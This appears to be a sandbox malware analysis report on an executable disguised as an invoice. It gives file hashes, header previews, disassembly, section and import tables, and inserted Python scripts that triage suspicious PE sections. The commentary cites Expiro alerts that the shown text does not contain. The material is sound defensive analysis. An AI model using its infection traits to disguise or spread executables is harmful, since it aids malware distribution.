                                                                                                                                                                MD5:BB516AD00A572BD36D65033D5A6DA5D2
                                                                                                                                                                SHA1:C6A37EB9185F8E9C0DE17817DA0655ECDD1A137A
                                                                                                                                                                SHA-256:B0D1CFC84983DEBFE0AD52063DA1DA61497815C43A416406D75163E95BA005FA
                                                                                                                                                                SHA-512:0A03686CFED7BE7C13C9EB464B1B6B50CA6DD74B830E4F04341E71931422A5E470743DA2B93A1D6D5507461BE3703A480781F313DF9358ACC9E0E959F1427765
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...~...~...~...~...~......~......~......~......~...~...~......~......~.o~...~......~Rich...~........PE..d....-JX.........."..........N......0..........@............................. ............ .......... .................................@%..0........ .. ...............................8...........................P............... ................................text...Z........................... ..`.rdata..............................@..@.data...............................@....pdata........... ..................@..@.rsrc... .... ......................@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2083328
                                                                                                                                                                Entropy (8bit):7.086602580064013
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:7LbYI4I0bVKBUhx8CRSrzQ8vbeKgSRpXxmDYeQeaUx7qEaYZgFIDRRAubt5M:TYZkBU6ZvCK/phm8eQN82Uf
                                                                                                                                                                MD5:B9B616B65A90E396A161A24A8A456884
                                                                                                                                                                SHA1:BD17E97CFACEB35FACA77FC63D9502D1968FEE0E
                                                                                                                                                                SHA-256:B20F84651BEC2A01953D66A43A555500E363B892EF71FB635FB7D66FA0100145
                                                                                                                                                                SHA-512:D608E1DAA5AC077496B0546B9711779BAF8137C1EB7E210BDB47720C6F3E9DAB2BA9CFF2787837AC0F051BF1E4DFCF1681D9B252F57CB2B5C6056EB1768CCF15
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|...|...|...u.4.~...u.%.w...u.2.c...|...~..u.".e...u.+.....u.3.}...u.5.}...u.0.}...Rich|...........................PE..d...Q..L.........."......8..........H........................................ ......t .............. ...............................B......X...@...............................................................................t....................................text....6.......8.................. ..`.data....-...P.......>..............@....pdata...............L..............@..@.rsrc...............................@..@.reloc....... ......................@...U..L.......L.......L.......L.......L....7..L.......L.......L....,..L....0..L....n..L.......L.......L.......L.......L)......L4...1..LA......LM......LX...q..Le...........ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.RPCRT4.dll.VSSAPI.DLL.SETUPAPI.dll.NETA
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1276416
                                                                                                                                                                Entropy (8bit):6.993606629682265
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:rGne3OZEIOLMCldIgbZVg9N9JMlDlfjRiVuVsWt5MJMs:xeZizdIgbjgFIDRRAubt5M
                                                                                                                                                                MD5:22DA4B53195377BBE2A2460989C3D203
                                                                                                                                                                SHA1:E20761786A4FB40EF1D483EB7964F8A6C080E0C7
                                                                                                                                                                SHA-256:18A0332DA30D012BC06D16A5373EA9A2625D0095999181B1D8070181922FF7D6
                                                                                                                                                                SHA-512:A6B806C3B9FAA3D6DB0B68D1A983498DDBFDB3AF1E3E99FABAD12965D62B05B4F0CB7FCE87A8DD37CBDC8DBAF142ED71E60836A9D2703811C8CC0DA0EB499C2C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X..9...9...9...A8..9...A)..9...A>..9...9...8...A...9...A'..9...A?..9...A9..9...A<..9..Rich.9..........PE..d......L..........".................4G.........@....................................A<............... ..............................dm......do..........`....`...K...................'..8............................................0..p............................text...h........................... ..`.rdata.......0......................@..@.data...l....@.......(..............@....pdata...K...`...L...:..............@..@.rsrc...`...........................@..@.reloc..............................@...U..Lx......L.......L.......L....7..L.......L....,..L....0..L.......L.......L.......L.......L.......L....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.SHLWAPI.dll.VERSION.dll.ehTrace.dll.SHELL32.dll.slc.dll........
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1625600
                                                                                                                                                                Entropy (8bit):4.203355634797232
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:wwXAwhzV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:rQwh5Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:C0B1AC1980E0EE5E641EA4C250791D87
                                                                                                                                                                SHA1:92BAF4E87A29EC1CA026E1F81F2E9D07A923DA6A
                                                                                                                                                                SHA-256:BD9641A049AD1A823DA8713A34D0D4310163B6F42ACDEC233040465008ED96C9
                                                                                                                                                                SHA-512:6ED1955FA30634C048C6A3D6875BF5B3B2D572828FDD9960B5E59F8D237A9BA5E7643DA65A83F6BF43BF8BC9A821E7ED334964E1F332A3F0249A8D596C36D318
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... Z..N...N...N.......N.......N.......N...O.u.N.......N.......N.......N.......N.Rich..N.........................PE..d...5.[J..........".................L?.........@............................. ......|................ .................................................p............................+..8............................................0...............................text...l........................... ..`.rdata.......0....... ..............@..@.data...............................@....pdata..............................@..@.rsrc...p...........................@..@.reloc.......0......................@...k.[JP.....[J]...+.[Jj.....[Jt.....[J....+.[Jj.....[J......[J....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.slc.dll........................................................................................
                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):7.4930840408824
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:invoice_96.73.exe
                                                                                                                                                                File size:1'799'680 bytes
                                                                                                                                                                MD5:0ad46265c37a53172d0658e862699a0e
                                                                                                                                                                SHA1:82a738aeecee1392fcbb46a6ebceb367790e4831
                                                                                                                                                                SHA256:04bd713b045d145c032e88c3f122e92565b3647e016367e29987c9afc2666d04
                                                                                                                                                                SHA512:5e8e026dbd9a1c2f2c056010722e22a4be154eb46e5e5625117543a08d2fa4c4472c3b1c9e2807cc19cabc21993d745a76f6dab900e63ba970b5b9bf3bdf1d2d
                                                                                                                                                                SSDEEP:24576:7tb20pOaCqT5TBWgNQ7akrR8kGeN5QRY+Dbjkf256AkVg9N9JMlDlfjRiVuVsWtK:4vg5tQ7akrekGqEvd5kgFIDRRAubt5M
                                                                                                                                                                TLSH:D985F11373DE83A1C3B25273BA267741AE7F782506A1F56B2FD4093DEC60122525EB63
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                                                                                Icon Hash:aaf3e3e3938382a0
                                                                                                                                                                Entrypoint:0x425f74
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x67470F67 [Wed Nov 27 12:24:07 2024 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:5
                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                File Version Major:5
                                                                                                                                                                File Version Minor:1
                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091
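The static fields above (Entrypoint, Imagebase, Subsystem, Image File Characteristics, DLL Characteristics, Time Stamp, OS/Subsystem version, 8-bit entropy) all come straight out of the COFF and optional headers, and a practitioner will usually want to re-derive them independently rather than trust one tool's rendering. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: a minimal PE header parser plus Shannon entropy, run against a constructed header (not the real sample) whose values are set to mirror the report: entry 0x425f74 at image base 0x400000, link timestamp 0x67470F67, characteristics EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | 32BIT_MACHINE, and DLL characteristics TERMINAL_SERVER_AWARE only. The flag tables and offsets follow the PE specification; `missing_mitigations` is a helper name chosen here and lists the opt-in mitigations (DYNAMIC_BASE for ASLR, NX_COMPAT for DEP) that this characteristics value does not set.

```python
"""Minimal PE header parser and entropy calculator (added example, not Joe Sandbox code)."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_FILE_CHARACTERISTICS bits (names as in the PE spec / the report's rendering).
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# IMAGE_DLLCHARACTERISTICS bits: mitigations the linker opts the image into.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",          # ASLR
    0x0100: "NX_COMPAT",             # DEP
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}


def flag_names(value, table):
    """Names of the set bits, in ascending bit order (matches the report's listing order)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data):
    """Return the static header fields a sandbox report lists; ValueError if not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSymbols, SizeOfOptHdr, Characteristics
    machine, nsections, timestamp, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:            # PE32: 4-byte ImageBase at optional-header offset 28
        base_fmt, base_ofs = "<I", 28
    elif magic == 0x20B:          # PE32+: 8-byte ImageBase at offset 24 (no BaseOfData field)
        base_fmt, base_ofs = "<Q", 24
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (imagebase,) = struct.unpack_from(base_fmt, data, opt + base_ofs)
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dllchars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "pe32plus": magic == 0x20B,
        "machine": machine,
        "sections": nsections,
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "entrypoint_rva": entry_rva,
        "entrypoint_va": imagebase + entry_rva,   # the report prints the VA (0x425f74)
        "imagebase": imagebase,
        "os_version": "%d.%d" % (os_major, os_minor),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "characteristics": flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dllchars, DLL_CHARACTERISTICS),
        "entropy": shannon_entropy(data),
    }


def missing_mitigations(info):
    """Opt-in mitigations the image does not declare (helper name is this example's own)."""
    return [m for m in ("DYNAMIC_BASE", "NX_COMPAT") if m not in info["dll_characteristics"]]


def build_sample_pe32():
    """Constructed header only (not the real sample): values mirror the report's static section."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x67470F67, 0, 0, 224, 0x0122)
    # Magic, linker ver, SizeOfCode/InitData/UninitData, EntryRVA, BaseOfCode, BaseOfData,
    # ImageBase, SectionAlignment, FileAlignment
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, 0x25F74, 0x1000, 0x9A000,
                      0x400000, 0x1000, 0x200)
    # OS 5.1, Image 5.1, Subsystem 5.1, Win32Version, SizeOfImage, SizeOfHeaders, CheckSum,
    # Subsystem=GUI, DllCharacteristics=TERMINAL_SERVER_AWARE only
    opt += struct.pack("<HHHHHHIIIIHH", 5, 1, 5, 1, 5, 1, 0, 0xC1000, 0x400, 0, 2, 0x8000)
    opt += b"\0" * (224 - len(opt))
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    info = parse_pe(build_sample_pe32())
    for k, v in info.items():
        print("%-20s %s" % (k, hex(v) if isinstance(v, int) and not isinstance(v, bool) else v))
    print("missing mitigations:", missing_mitigations(info))
```

Two caveats when reading the real report's values this way: the link timestamp is attacker-controlled and only shows what the linker was told, so 0x67470F67 (27 Nov 2024) is a hint, not evidence; and a whole-file entropy near 7.5 is typical of an executable carrying compressed or encrypted payload data, which is worth correlating with the section table before calling it packed.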
                                                                                                                                                                Instruction
                                                                                                                                                                call 00007FA32CD5718Fh
                                                                                                                                                                jmp 00007FA32CD4A1A4h
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                push edi
                                                                                                                                                                push esi
                                                                                                                                                                mov esi, dword ptr [esp+10h]
                                                                                                                                                                mov ecx, dword ptr [esp+14h]
                                                                                                                                                                mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                mov edx, ecx
                                                                                                                                                                add eax, esi
                                                                                                                                                                cmp edi, esi
                                                                                                                                                                jbe 00007FA32CD4A32Ah
                                                                                                                                                                cmp edi, eax
                                                                                                                                                                jc 00007FA32CD4A68Eh
                                                                                                                                                                bt dword ptr [004C0158h], 01h
                                                                                                                                                                jnc 00007FA32CD4A329h
                                                                                                                                                                rep movsb
                                                                                                                                                                jmp 00007FA32CD4A63Ch
                                                                                                                                                                cmp ecx, 00000080h
                                                                                                                                                                jc 00007FA32CD4A4F4h
                                                                                                                                                                mov eax, edi
                                                                                                                                                                xor eax, esi
                                                                                                                                                                test eax, 0000000Fh
jne 00007FA32CD4A330h
bt dword ptr [004BA370h], 01h
jc 00007FA32CD4A800h
bt dword ptr [004C0158h], 00000000h
jnc 00007FA32CD4A4CDh
test edi, 00000003h
jne 00007FA32CD4A4DEh
test esi, 00000003h
jne 00007FA32CD4A4BDh
bt edi, 02h
jnc 00007FA32CD4A32Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FA32CD4A333h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FA32CD4A385h
bt esi, 03h
jnc 00007FA32CD4A3D8h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7004          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x60be0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d8d0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb2730          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8d000          0x860         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text   0x1000           0x8b54f       0x8b600   b92b1482df7de0712da080eaf44fb490  False     0.5699516535874439   data       6.680433526828655  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8d000          0x2cc42       0x2ce00   827ffd24759e8e420890ecf164be989e  False     0.330464397632312    data       5.770192333189168  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xba000          0x9d54        0x6200    e0a519f8e3a35fae0d9c2cfd5a4bacfc  False     0.16402264030612246  data       2.002691099965349  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc4000          0x60be0       0x60c00   a9c5e6f80a5245cdcf308d90e1a5a77d  False     0.9326651324289406   data       7.90341452865778   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x125000         0x99000       0x98000   e198d289e42fb32f681b32c20a88ce36  False     0.9548998380962171   data       7.876658513199357  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
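Two things in the section and data-directory tables above deserve a closer look than the report gives them. IMAGE_DIRECTORY_ENTRY_BASERELOC is 0x0/0x0, so the loader will never read a relocation table, yet the file carries a .reloc section of 0x98000 raw bytes that is marked EXECUTE and WRITE as well as DISCARDABLE and has an entropy of 7.88. A genuine relocation section is read-only data with low entropy; a last section that is executable, writable and near-random is what a file infector that appends its body to an existing executable leaves behind, which fits the "Infects executable files" signature and the Expiro alerts listed further down. By contrast, .text at 6.68 and .data at 2.00 are ordinary values for compiled code and initialised data.

The following script is an added example, not part of the Joe Sandbox report, that performs exactly these checks on any PE file using only the standard library. It parses the data directories and section headers with struct, computes Shannon entropy per section, and flags RWX sections, executable sections with entropy above 7.0 (a threshold chosen here, not taken from the report), and a .reloc section without a BASERELOC directory. build_test_pe() constructs a synthetic PE32 image so the block runs offline; to triage a real sample call triage(open(path, "rb").read()).

```python
# Added example (not from the Joe Sandbox report): PE section triage with struct only.
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DIR_BASERELOC = 5  # index of IMAGE_DIRECTORY_ENTRY_BASERELOC in the data directory array


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes):
    """Return (data_directories, sections) for a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    nrva_off, dir_off = (92, 96) if magic == 0x10B else (108, 112)  # PE32 vs PE32+
    nrva = struct.unpack_from("<I", data, opt + nrva_off)[0]
    dirs = [struct.unpack_from("<II", data, opt + dir_off + 8 * i) for i in range(nrva)]
    sections = []
    for i in range(num_sections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vsize": vsize, "va": va, "rawsize": rawsize, "chars": chars,
            "entropy": shannon_entropy(data[rawptr:rawptr + rawsize]),
        })
    return dirs, sections


def triage(data: bytes) -> list:
    """Findings a reviewer would raise from the section table alone."""
    dirs, sections = parse_pe(data)
    has_reloc_dir = len(dirs) > DIR_BASERELOC and dirs[DIR_BASERELOC] != (0, 0)
    findings = []
    for s in sections:
        c, name = s["chars"], s["name"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{name}: writable and executable (RWX)")
        if c & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > 7.0:  # 7.0 is this example's threshold
            findings.append(f"{name}: executable with entropy {s['entropy']:.2f} (packed or encrypted?)")
        if name == ".reloc" and not has_reloc_dir:
            findings.append(".reloc: section exists but IMAGE_DIRECTORY_ENTRY_BASERELOC is empty")
    return findings


def build_test_pe(reloc_chars: int, reloc_dir: tuple) -> bytes:
    """Constructed minimal PE32 (not a real sample): a .text section and a .reloc section."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)  # PE32 optional header with 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)
    struct.pack_into("<II", opt, 96 + 8 * DIR_BASERELOC, *reloc_dir)
    text_body = (b"\x90" * 0x200 + b"\xc3").ljust(0x400, b"\0")  # low entropy
    reloc_body = bytes(range(256)) * 4  # entropy exactly 8.0
    sec = "<8sIIIIIIHHI"
    text_hdr = struct.pack(sec, b".text", 0x201, 0x1000, 0x400, 0x200, 0, 0, 0, 0,
                           IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    reloc_hdr = struct.pack(sec, b".reloc", 0x400, 0x2000, 0x400, 0x600, 0, 0, 0, 0, reloc_chars)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text_hdr + reloc_hdr).ljust(0x200, b"\0")
    return headers + text_body + reloc_body


# The characteristics the report lists for this sample's .reloc section.
SAMPLE_RELOC_CHARS = (IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE |
                      IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)

if __name__ == "__main__":
    for line in triage(build_test_pe(SAMPLE_RELOC_CHARS, (0, 0))):
        print(line)
```

On the synthetic image built with the sample's .reloc flags and an empty BASERELOC entry, triage() returns three findings (RWX, high-entropy executable section, .reloc without a relocation directory); with a read-only .reloc and a populated directory it returns none. The entropy threshold and the constructed image are this example's choices; the section names, flags and directory layout are the standard PE format.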
Name           RVA       Size     Type                                                                        Language  Country        ZLIB Complexity
RT_ICON        0xc45a8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192              English   Great Britain  0.7466216216216216
RT_ICON        0xc46d0   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors  English   Great Britain  0.3277027027027027
RT_ICON        0xc47f8   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 192              English   Great Britain  0.3885135135135135
RT_ICON        0xc4920   0x2e8    Device independent bitmap graphic, 32 x 64 x 4, image size 0                English   Great Britain  0.3333333333333333
RT_ICON        0xc4c08   0x128    Device independent bitmap graphic, 16 x 32 x 4, image size 0                English   Great Britain  0.5
RT_ICON        0xc4d30   0xea8    Device independent bitmap graphic, 48 x 96 x 8, image size 0                English   Great Britain  0.2835820895522388
RT_ICON        0xc5bd8   0x8a8    Device independent bitmap graphic, 32 x 64 x 8, image size 0                English   Great Britain  0.37906137184115524
RT_ICON        0xc6480   0x568    Device independent bitmap graphic, 16 x 32 x 8, image size 0                English   Great Britain  0.23699421965317918
RT_ICON        0xc69e8   0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0               English   Great Britain  0.13858921161825727
RT_ICON        0xc8f90   0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0               English   Great Britain  0.25070356472795496
RT_ICON        0xca038   0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0               English   Great Britain  0.3173758865248227
RT_MENU        0xca4a0   0x50     data                                                                        English   Great Britain  0.9
RT_STRING      0xca4f0   0x594    data                                                                        English   Great Britain  0.3333333333333333
RT_STRING      0xcaa84   0x68a    data                                                                        English   Great Britain  0.2747909199522103
RT_STRING      0xcb110   0x490    data                                                                        English   Great Britain  0.3715753424657534
RT_STRING      0xcb5a0   0x5fc    data                                                                        English   Great Britain  0.3087467362924282
RT_STRING      0xcbb9c   0x65c    data                                                                        English   Great Britain  0.34336609336609336
RT_STRING      0xcc1f8   0x466    data                                                                        English   Great Britain  0.3605683836589698
RT_STRING      0xcc660   0x158    Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0            English   Great Britain  0.502906976744186
RT_RCDATA      0xcc7b8   0x57ee7  data                                                                        (none)    (none)         1.0003220728162214
RT_GROUP_ICON  0x1246a0  0x76     data                                                                        English   Great Britain  0.6610169491525424
RT_GROUP_ICON  0x124718  0x14     data                                                                        English   Great Britain  1.25
RT_GROUP_ICON  0x12472c  0x14     data                                                                        English   Great Britain  1.15
RT_GROUP_ICON  0x124740  0x14     data                                                                        English   Great Britain  1.25
RT_VERSION     0x124754  0xdc     data                                                                        English   Great Britain  0.6181818181818182
RT_MANIFEST    0x124830  0x3b0    ASCII text, with CRLF line terminators                                      English   Great Britain  0.5116525423728814
DLL            Import
WSOCK32.dll:   __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll:   GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll:     timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll:  ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll:       WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll:   InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL:     GetProcessMemoryInfo
IPHLPAPI.DLL:  IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll:   UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll:   IsThemeActive
